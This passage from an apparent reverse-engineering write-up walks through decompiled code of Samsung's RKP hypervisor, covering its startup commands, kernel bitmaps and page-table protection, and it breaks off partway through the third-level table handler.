// Save the offset between the kernel virtual and physical mappings into `KIMAGE_VOFFSET`.
KIMAGE_VOFFSET = regs->x3;
// Convert the address of the `rkp_init_data` structure from a VA to a PA using `rkp_get_pa`.
rkp_init_data = rkp_get_pa(regs->x2);
// Check the magic value.
if (rkp_init_data->magic - 0x5afe0001 >= 2) {
uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
return -1;
}
// If it is the test magic value, call `rkp_init_cmd_counts_test` which allows test commands 0x81-0x88 to be called an
// unlimited number of times.
if (rkp_init_data->magic == 0x5afe0002) {
rkp_init_cmd_counts_test();
rkp_test = 1;
}
// Saves the various fields of `rkp_init_data` into global variables.
INIT_MM_PGD = rkp_init_data->init_mm_pgd;
ID_MAP_PGD = rkp_init_data->id_map_pgd;
ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
TRAMP_PGD = rkp_init_data->tramp_pgd;
TRAMP_VALIAS = rkp_init_data->tramp_valias;
VMALLOC_START = rkp_init_data->vmalloc_start;
VMALLOC_END = rkp_init_data->vmalloc_end;
TEXT = rkp_init_data->_text;
ETEXT = rkp_init_data->_etext;
TEXT_PA = rkp_get_pa(TEXT);
ETEXT_PA = rkp_get_pa(ETEXT);
SRODATA = rkp_init_data->_srodata;
ERODATA = rkp_init_data->_erodata;
TRAMP_PGD_PAGE = TRAMP_PGD & 0xfffffffff000;
INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xfffffffff000;
LARGE_MEMORY = rkp_init_data->large_memory;
page_ro = 0;
page_free = 0;
s2_breakdown = 0;
pmd_allocated_by_rkp = 0;
NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
if (rkp_bitmap_init() < 0) {
uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
return -1;
}
// Create a new memlist to contain the list of kernel executable regions.
memlist_init(&executable_regions);
memlist_set_unkn_14(&executable_regions);
// Add the kernel text to the newly created memlist.
memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
// Add the `TRAMP_VALIAS` page to the newly created memlist.
if (TRAMP_VALIAS) {
memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
}
// Create a new memlist of dynamically loaded executable regions.
memlist_init(&dynamic_load_regions);
memlist_set_unkn_14(&dynamic_load_regions);
// Call a function that makes the static heap acquire all the unused dynamic memory.
put_all_dynamic_heap_chunks_in_static_heap();
// Map and protect various kernel regions in the second stage at EL1, and at EL2.
if (rkp_paging_init() < 0) {
uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
return -1;
}
// Mark RKP as initialized.
rkp_inited = 1;
// Call a function that will process the user page tables.
if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xfffffffff000, 0, 1) < 0) {
uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
return -1;
}
// Log EL2 system registers values.
uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
uh_log('L', "rkp_init.c", 186, "RKP Activated");
return 0;
}
The rkp_paging_init function unmaps the hypervisor memory from the second stage, marks the kernel text region as TEXT in the physmap, and makes it read-only from the hypervisor (at EL2 stage 1). The swapper_pg_dir page is made writable from the hypervisor, whereas the empty_zero_page is made executable in the second stage. The kernel text is made executable for the kernel, and the log region and the dynamic heap region are made read-only from the kernel.
int64_t rkp_paging_init() {
// ...
// Ensure the start of the kernel text is page-aligned.
if (!TEXT || (TEXT & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
return -1;
}
// Ensure the end of the kernel text is page-aligned.
if (!ETEXT || (ETEXT & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
return -1;
}
// Ensure the kernel text section doesn't contain the base address.
if (TEXT_PA <= get_base() && ETEXT_PA > get_base()) {
return -1;
}
// Unmap the hypervisor memory from the second stage (to make it inaccessible to the kernel).
if (s2_unmap(0x87000000, 0x200000)) {
return -1;
}
// Set the kernel text section as `TEXT` in the physmap.
if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
return -1;
}
// Set the kernel text section as read-only from the hypervisor.
if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
return -1;
}
// Ensure the `swapper_pg_dir` is not contained within the kernel text section.
if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
// Set the `swapper_pg_dir` as writable from the hypervisor.
if (s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
rkp_phys_map_lock(ZERO_PG_ADDR);
// Set the `empty_zero_page` as read-only executable in the second stage.
if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0 /* read-write */, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
return -1;
}
rkp_phys_map_unlock(ZERO_PG_ADDR);
// Make the kernel text section executable for the kernel (note the 0 given as argument).
if (rkp_set_kernel_rox(0 /* read-write */)) {
return -1;
}
// Set the log region read-only in the second stage.
if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80 /* read-only */, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
return -1;
}
// Ensure the dynamic heap has been initialized.
if (!uh_state.dynamic_heap_inited) {
return 0;
}
// Set the dynamic heap region as read-only in the second stage.
if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80 /* read-only */,
1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
return -1;
}
return 0;
}
The rkp_set_kernel_rox
function makes the kernel text and rodata sections executable in the second stage, and depending on the access
argument, either writable or read-only. When the function is first called, the argument is 0, but it is called again later with 0x80. It also updates the ro_bitmap
to mark the kernel rodata section pages as read-only (which is different from the actual page tables).
int64_t rkp_set_kernel_rox(int64_t access) {
// ...
// Set the kernel text and rodata sections as executable.
erodata_pa = rkp_get_pa(ERODATA);
if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1 /* executable */, 1) < 0) {
uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
return -1;
}
// If the kernel text and rodata sections are read-only in the second stage, return here.
if (access) {
return 0;
}
// Ensure the end of the kernel text and rodata sections are page-aligned.
if (((erodata_pa | ETEXT_PA) & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
return 0;
}
// Ensure the end of the kernel text is before the end of the rodata section.
if (ETEXT_PA > erodata_pa) {
uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
return 0;
}
// Mark all the pages belonging to the kernel rodata as read-only in the `ro_bitmap`.
paddr = ETEXT_PA;
while (sparsemap_set_value_addr(&uh_state.ro_bitmap, paddr, 1) >= 0) {
paddr += 0x1000;
if (paddr >= erodata_pa) {
return 0;
}
}
uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
return 0;
}
We mentioned that, after rkp_paging_init
, rkp_start
also calls rkp_l1pgt_process_table
to process the page tables. We will detail the inner workings of this function later, but it is called with the value of the TTBR0_EL1
register and mainly makes its 3 levels of tables read-only.
On the kernel side, the second startup-related command is called in rkp_deferred_init
.
static inline void rkp_deferred_init(void){
uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}
rkp_deferred_init
itself is called by kernel_init
, which is later in the kernel boot process.
static int __ref kernel_init(void *unused)
{
// ...
rkp_deferred_init();
// ...
}
On the hypervisor side, the command handler rkp_cmd_deferred_start
simply calls rkp_deferred_start
. It sets the kernel text section as read-only in the second stage. It also processes the two kernel page tables, swapper_pg_dir
and tramp_pg_dir
, using the rkp_l1pgt_process_table
function.
int64_t rkp_deferred_start() {
uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
// Set the kernel text section as read-only in the second stage (here the argument is 0x80).
if (rkp_set_kernel_rox(0x80 /* read-only */)) {
return -1;
}
// Call a function that will process the `swapper_pg_dir` kernel page tables.
if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1ffffff, 1) < 0) {
uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
return -1;
}
// Call a function that will process the `tramp_pg_dir` kernel page tables.
if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1ffffff, 1) < 0) {
uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
return -1;
}
// Mark RKP as deferred initialized.
rkp_deferred_inited = 1;
uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
memory_fini();
return 0;
}
By digging in the kernel sources, we can find 3 more commands that are called by the kernel during startup.
Two of them are still called in rkp_init:
static void __init rkp_init(void)
{
// ...
rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
// ...
}
The two commands RKP_GET_RO_BITMAP
and RKP_GET_DBL_BITMAP
take an instance of sparse_bitmap_for_kernel
as an argument.
typedef struct sparse_bitmap_for_kernel {
u64 start_addr;
u64 end_addr;
u64 maxn;
char **map;
} sparse_bitmap_for_kernel_t;
These instances are rkp_s_bitmap_ro
and rkp_s_bitmap_dbl
, respectively.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
They correspond to the hypervisor's ro_bitmap
and dbl_bitmap
sparsemaps, respectively.
The first one is used to check if a page has been set as read-only by the hypervisor, using the rkp_is_pg_protected
function.
static inline u8 rkp_is_pg_protected(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}
The second one is used to check if a page is already mapped and should not be mapped a second time, using the rkp_is_pg_dbl_mapped
function.
static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}
Both functions call rkp_check_bitmap
, which extracts the bit corresponding to the given physical address from the kernel bitmap.
#define SPARSE_UNIT_BIT (30)
#define SPARSE_UNIT_SIZE (1<<SPARSE_UNIT_BIT)
// ...
static inline u8 rkp_check_bitmap(u64 pa, sparse_bitmap_for_kernel_t *kernel_bitmap){
u8 val;
u64 offset, map_loc, bit_offset;
char *map;
if(!kernel_bitmap || !kernel_bitmap->map)
return 0;
offset = pa - kernel_bitmap->start_addr;
map_loc = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) >> 3;
bit_offset = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) % 8;
if(kernel_bitmap->maxn <= (offset >> SPARSE_UNIT_BIT))
return 0;
map = kernel_bitmap->map[(offset >> SPARSE_UNIT_BIT)];
if(!map)
return 0;
val = (u8)((*(u64 *)(&map[map_loc])) >> bit_offset) & ((u64)1);
return val;
}
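To make the indexing concrete, each entry of map covers one SPARSE_UNIT_SIZE (1 GB) chunk, with one bit per 4 KB page. Here is a worked example with made-up addresses:
/*
 * Worked example (hypothetical addresses): start_addr = 0x80000000,
 * pa = 0xc0001000.
 *
 *   offset     = pa - start_addr                         = 0x40001000
 *   chunk      = offset >> SPARSE_UNIT_BIT               = 1  -> kernel_bitmap->map[1]
 *   page index = (offset % SPARSE_UNIT_SIZE) / PAGE_SIZE = 1
 *   map_loc    = page index >> 3                         = 0  -> byte 0 of that chunk
 *   bit_offset = page index % 8                          = 1  -> bit 1 of that byte
 */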
RKP_GET_RO_BITMAP
and RKP_GET_DBL_BITMAP
are handled similarly by the hypervisor, so we will only take a look at the handler for the first one.
rkp_cmd_get_ro_bitmap
allocates a sparse_bitmap_for_kernel_t
structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel
, which will fill it with the information in ro_bitmap
. Then it puts the VA from the newly allocated structure into X0, and if a pointer was provided in X2, it will also put the VA there (using virt_to_phys_el1
to convert it).
int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
// ...
// This command cannot be called after RKP has been deferred initialized.
if (rkp_deferred_inited) {
return -1;
}
// Allocate the bitmap structure that will be returned to the kernel.
bitmap = dynamic_heap_alloc(0x20, 0);
if (!bitmap) {
uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
return -1;
}
// Reset the newly allocated structure.
memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
// Fill the kernel bitmap with the contents of the hypervisor `ro_bitmap`.
res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
if (res) {
uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
return res;
}
// Put the kernel bitmap VA in x0.
regs->x0 = rkp_get_va(bitmap);
// Put the kernel bitmap VA in the memory referenced by x2.
if (regs->x2) {
*virt_to_phys_el1(regs->x2) = regs->x0;
}
uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
return 0;
}
To see how the kernel bitmap is filled from the hypervisor sparsemap, let's look at sparsemap_bitmap_kernel
. This function converts the PAs of all the sparsemap entries into VAs before copying them into the sparse_bitmap_for_kernel_t
structure.
int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
// ...
// Sanity-check the arguments.
if (!map || !kernel_bitmap) {
return -1;
}
// Copy the start address, end address, and entries unchanged.
kernel_bitmap->start_addr = map->start_addr;
kernel_bitmap->end_addr = map->end_addr;
kernel_bitmap->maxn = map->count;
// Allocate from the dynamic heap an array to hold the entries addresses.
bitmaps = dynamic_heap_alloc(8 * map->count, 0);
if (!bitmaps) {
uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
return -1;
}
// Private sparsemaps are not allowed to be accessed by the kernel.
if (map->private) {
uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
return -1;
}
// Zero out the allocated memory.
memset(bitmaps, 0, 8 * map->count);
// Save the VA of the allocated array.
kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xffffffc000000000;
index = 0;
do {
// Store the VAs of the entries into the array.
bitmap = map->entries[index].bitmap;
if (bitmap) {
bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xffffffc000000000;
}
++index;
} while (index < kernel_bitmap->maxn);
return 0;
}
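The (bitmap - PHYS_OFFSET) | 0xffffffc000000000 expression is simply the inverse of the kernel's __pa for the linear mapping: subtract the physical DRAM base and OR in the linear map base. As a one-line sketch (the helper name is ours, not part of the hypervisor code):
/* Convert a PA back into a kernel linear-mapping VA (sketch). */
static inline u64 pa_to_linear_va(u64 pa) {
  return (pa - PHYS_OFFSET) | 0xffffffc000000000ull;
}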
The third command is RKP_GET_RKP_GET_BUFFER_BITMAP
, and it is called by the kernel in rkp_robuffer_init
.
static void __init rkp_robuffer_init(void)
{
rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}
It is also used to retrieve a sparsemap, this time the page_allocator.map
.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
It is used to check if a page comes from the hypervisor's pages allocator using the is_rkp_ro_page
function.
static inline unsigned int is_rkp_ro_page(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}
The 3 commands used for retrieving a sparsemap are all called from the start_kernel
function.
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_robuffer_init();
// ...
rkp_init();
// ...
}
To summarize a little bit, these bitmaps are used by the kernel to check if some data is located on a page that is protected by RKP. If that is the case, the kernel knows it will need to call one of the RKP commands to modify it.
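To illustrate, here is a simplified sketch of how such a check is typically wired into the kernel's page-table setters: if the target entry lives on a page made read-only by RKP, the write is delegated to the hypervisor via uh_call instead of being performed directly. The command name RKP_WRITE_PGT3 and the exact shape of the real set_pte are assumptions here, not something covered by this post.
static inline void set_pte(pte_t *ptep, pte_t pte)
{
  /* Sketch: the PTE lives on an RKP-protected page, so the hypervisor has to
   * perform the write on the kernel's behalf (command name assumed). */
  if (rkp_is_pg_protected((u64)ptep))
    uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
  else
    *ptep = pte;
}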
We left it aside for a moment when we saw the calls to rkp_l1pgt_process_table
in rkp_start
and rkp_deferred_start
, but now the time has come to detail how the kernel page tables are processed by the hypervisor. But first, a quick reminder about the layout of the kernel pages table.
Here is the Linux memory layout on Android (using 4 KB pages + 3 levels):
Start End Size Use
-----------------------------------------------------------------------
0000000000000000 0000007fffffffff 512GB user
ffffff8000000000 ffffffffffffffff 512GB kernel
And here is the corresponding translation table lookup:
+--------+--------+--------+--------+--------+--------+--------+--------+
|63 56|55 48|47 40|39 32|31 24|23 16|15 8|7 0|
+--------+--------+--------+--------+--------+--------+--------+--------+
| | | | | |
| | | | | v
| | | | | [11:0] in-page offset
| | | | +-> [20:12] L3 index (PTE)
| | | +-----------> [29:21] L2 index (PMD)
| | +---------------------> [38:30] L1 index (PUD)
| +-------------------------------> [47:39] L0 index (PGD)
+-------------------------------------------------> [63] TTBR0/1
So keep in mind for this section that we have PGD = PUD = VA[38:30] because we are only using 3 levels of AT.
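Concretely, the shift-and-mask operations found throughout the page table processing code below extract these indexes as follows (the macro names are ours):
/* Index extraction for a 4 KB granule with 3 levels of translation. */
#define L1_INDEX(va)       (((va) >> 30) & 0x1ff)  /* PGD/PUD index */
#define L2_INDEX(va)       (((va) >> 21) & 0x1ff)  /* PMD index */
#define L3_INDEX(va)       (((va) >> 12) & 0x1ff)  /* PTE index */
#define PAGE_OFFSET_OF(va) ((va) & 0xfff)          /* offset within the page */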
The level 0, level 1, and level 2 descriptors can be invalid, block, or table descriptors, while the level 3 descriptors can be invalid or page descriptors (refer to the Armv8-A VMSAv8-64 documentation for their exact formats).
Processing of the first level tables (or PGDs) is done by the rkp_l1pgt_process_table
function. A kernel PGD must be either swapper_pg_dir
or tramp_pg_dir
, unless we're prior to deferred initialization. The user PGD idmap_pg_dir
is also never processed by this function.
If the PGD is being introduced, it is marked as L1
in the physmap and made read-only in the second stage. If the PGD is being retired, it is marked as FREE
in the physmap and made writable in the second stage.
Finally, the descriptors of the PGD are processed: table descriptors are passed to the rkp_l2pgt_process_table
function and have their PXN
bit set if this was a user PGD, and block descriptors have their PXN
bit set regardless of the PGD type.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
// If this is a kernel PGD.
if (high_bits == 0x1ffffff) {
// It should be either `swapper_pg_dir` or `tramp_pg_dir`, or RKP should not be deferred initialized.
if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
// If it is not, we trigger a policy violation that results in a panic.
rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
return -1;
}
} else {
// If it is a user PGD and it is `idmap_pg_dir`, return without processing it.
if (ID_MAP_PGD == pgd) {
return 0;
}
}
rkp_phys_map_lock(pgd);
// If we are introducing this PGD.
if (is_alloc) {
// If it is already marked as a PGD in the physmap, return without processing it.
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (high_bits) {
type = KERNEL | L1;
} else {
type = L1;
}
// And mark the PGD as such in the physmap.
res = rkp_phys_map_set(pgd, type);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
// Make the PGD read-only in the second stage.
res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
rkp_phys_map_unlock(pgd);
return res;
}
}
// If we are retiring this PGD.
else {
// If it is not marked as a PGD in the physmap, return without processing it.
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Mark the PGD as `FREE` in the physmap.
res = rkp_phys_map_set(pgd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
// Make the PGD writable in the second stage.
res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
rkp_phys_map_unlock(pgd);
return res;
}
}
// Now iterate over each descriptor of the PGD.
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
desc_p = pgd + entry;
desc = *desc_p;
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
}
// Table descriptor.
else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// Make the memory non executable at EL1 for user PGDs.
if (!(start_addr >> 39)) {
set_pxn_bit_of_desc(desc_p, 1);
}
}
entry += 8;
offset += 0x40000000;
start_addr = addr;
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
Processing of the second level tables (or PMDs) is done by the rkp_l2pgt_process_table
function. If the first user PMD given to this function was not allocated from the hypervisor page allocator, then user PMDs will no longer be processed.
If the PMD is being introduced, it is marked as L2
in the physmap, and made read-only in the second stage. Kernel PMDs are never allowed to be retired. If a user PMD is being retired, it is marked as FREE
in the physmap and made writable in the second stage.
Finally, the descriptors of the PMD are processed: all descriptors are passed to the check_single_l2e
function.
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
// If this is a user PMD.
if (!(start_addr >> 39)) {
// The first time this function is called, determine if the PMD was allocated by the hypervisor page allocator. The
// default value of `pmd_allocated_by_rkp` is 0, 1 means "process the PMD", -1 means "don't process it".
if (!pmd_allocated_by_rkp) {
if (page_allocator_is_allocated(pmd) == 1) {
pmd_allocated_by_rkp = 1;
} else {
pmd_allocated_by_rkp = -1;
}
}
// If the PMD was not allocated by RKP, return without processing it.
if (pmd_allocated_by_rkp == -1) {
return 0;
}
}
rkp_phys_map_lock(pmd);
// If we are introducing this PMD.
if (is_alloc) {
// If it is already marked as a PMD in the physmap, return without processing it.
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (start_addr >> 39) {
type = KERNEL | L2;
} else {
type = L2;
}
// And mark the PMD as such in the physmap.
res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xff80 | type);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return res;
}
// Make the PMD read-only in the second stage.
res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
rkp_phys_map_unlock(pmd);
return res;
}
}
// If we are retiring this PMD.
else {
// If it is not marked as a PMD in the physmap, return without processing it.
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// Kernel PMDs are not allowed to be retired.
if (start_addr >= 0xffffff8000000000) {
rkp_policy_violation("Never allow free kernel page table %lx", pmd);
}
// Also check that it is not marked `KERNEL` in the physmap.
if (is_phys_map_kernel(pmd)) {
rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
}
// Mark the PMD as `FREE` in the physmap.
res = rkp_phys_map_set(pmd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return 0;
}
// Make the PMD writable in the second stage.
res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
rkp_phys_map_unlock(pmd);
return 0;
}
}
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pmd);
return res;
}
check_single_l2e
processes each PMD descriptor. If the descriptor is mapping a VA that is executable, the PMD is not allowed to be retired. If it is being introduced, then the hypervisor will protect the next level table. If the VA is not executable, the PXN
bit of the descriptor is set.
If the descriptor is a block descriptor, no further processing is performed. However, if it is a table descriptor, then the rkp_l3pgt_process_table
function is called to process the next level table.
int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
// If the virtual address mapped by this descriptor is executable (it is in the `executable_regions` memlist).
if (executable_regions_contains(start_addr, 2)) {
// The PMD is not allowed to be retired, trigger a policy violation.
if (!is_alloc) {
uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1ff,
(start_addr >> 21) & 0x1ff);
rkp_policy_violation("RKP_d60f7274");
}
// The PMD is being allocated, set the protect flag (to protect the next level table).
protect = 1;
} else {
// The virtual address is not executable, set the PXN bit of the descriptor.
set_pxn_bit_of_desc(desc_p, 2);
// Unset the protect flag (we don't need to protect the next level table).
protect = 0;
}
// Get the descriptor type.
desc = *desc_p;
type = desc & 0b11;
// Block descriptor, return without processing it.
if (type == 0b01) {
return 0;
}
// Invalid descriptor, return without processing it.
if (type != 0b11) {
if (desc) {
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
}
return 0;
}
// Table descriptor, log if the PT needs to be protected.
if (protect) {
uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1ff,
(start_addr >> 30) & 0x1ff);
}
// If the kernel PMD is being retired, log as well.
if (!is_alloc && start_addr >= 0xffffff8000000000) {
uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1ff,
(start_addr >> 21) & 0x1ff);
uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1ffffff, 0);
}
// Call rkp_l3pgt_process_table to process the PT.
return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}
Processing of the third level tables (or PTs) is done by the rkp_l3pgt_process_table
function. If the PT maps the kernel text, the PTE of the kernel text start is saved into the stext_ptep
global variable. If the PT doesn't need to be protected, the function returns without any processing.
If the PT is being introduced, it is marked as L3
in the physmap, and made read-only in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping non executable VAs have their PXN
bit set.
If the PT is being retired, it is marked as FREE
in the physmap and a violation is triggered. If the violation doesn't panic (though it should after initialization since rkp_panic_on_violation
is set), the PT is made writable in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping executable VAs trigger violations.
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
cs_enter(&l3pgt_lock);
// If `stext_ptep` hasn't been set already, and this PT maps the kernel text (i.e. the first virtual address mapped
// and the kernel text have the same PGD, PUD, PMD indexes), then set `stext_ptep` to the PTE of the kernel text
// start.
if (!stext_ptep && ((TEXT ^ start_addr) & 0x7fffe00000) == 0) {
stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1ff);
uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
}
cs_exit(&l3pgt_lock);
// If we don't need to protect this PT, return without processing it.
if (!protect) {
return 0;
}
rkp_phys_map_lock(pte);
// If we are introducing this PT.
if (is_alloc) {
// If it is already marked as a PT in the physmap, return without processing it.
if (is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
// Compute the correct type (`KERNEL` or not).
if (start_addr >> 39) {
type = KERNEL | L3;
} else {
type = L3;
}
// And mark the PT as such in the physmap.
res = rkp_phys_map_set(pte, type);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
// Make the PT read-only in the second stage.
res = rkp_s2_page_change_permission(pte, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
rkp_phys_map_unlock(pte);
return res;
}
// Now iterate over each descriptor of the PT.
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xffffffffffe00fff;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
// Invalid descriptor, trigger a violation.
if ((desc & 0b11) != 0b11) {
